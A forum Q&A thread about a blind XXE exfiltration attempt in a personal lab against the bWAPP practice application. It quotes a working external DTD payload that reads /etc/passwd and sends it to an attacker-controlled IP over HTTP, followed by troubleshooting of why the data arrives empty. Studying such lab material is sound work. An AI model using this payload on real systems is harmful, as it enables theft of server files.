# Blind XXE - Exfiltration Data via OOB

Tags: injection, xml, owasp-top-ten, xxe

My lab

1. Kali Linux:192.168.171.134
2. bWApp Server: http://192.168.171.131

I want to do an exfiltration data via HTTP on this Blind XXE.

I'll use the [Portswigger Payload](https://portswigger.net/web-security/xxe/blind).

This is the External.DTD:

- ```
     <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://192.168.171.134/?x=%file;'>">
     %eval;
     %exfiltrate;
  ```

This is following attempt to exploit it:

[image]

As you can see the Vulnerable Web Application does an HTTP Request to recall the evil.DTD, but when it does the HTTP GET with `/etc/passwd` the GET parameter is empty, why?

I also try to modified the `/etc/passwd` with `/etc/hostname` to avoid the possible `<>` problems inside that file, but it doesn't work.

Comment: I removed your screenshots because the images were not found.

Answer (score 1):

Well, there could be many reasons (sorted by order of probability):

1. The XML parser is running inside Docker: If it's running inside docker, there's no `/etc/passwd` file nor `/etc/hostname` file to leak.
2. The XML parser does not have enough privileges to read those files.
3. The files you're trying to leak are in a different encoding than expected (Expected UTF-8, got UTF-16).
4. The files you're trying to leak is corrupted.
5. The files you're trying to leak is empty.

For all of the previous cases: instead of returning a nasty error, it returns an empty string, hence why the `x` parameter in the GET request is empty.

Comment: Thanks for the answer

1) It's a another VM 2) I tried to switch into www-data user (on bwapp server) and i can see the /etc/passwd file with cat command 3) i forced the UTF-8 and UTF-16 but it doesn't work, i insert in the HTTP request the following XML code: <?xml version="1.0" encoding="UTF-16"?> ... / <?xml version="1.0" encoding="UTF-8"?> ...  4) I don't think, how can i check? 5) it's not empty. If i use ftp:// instead HTTP:// i also get the same X value empty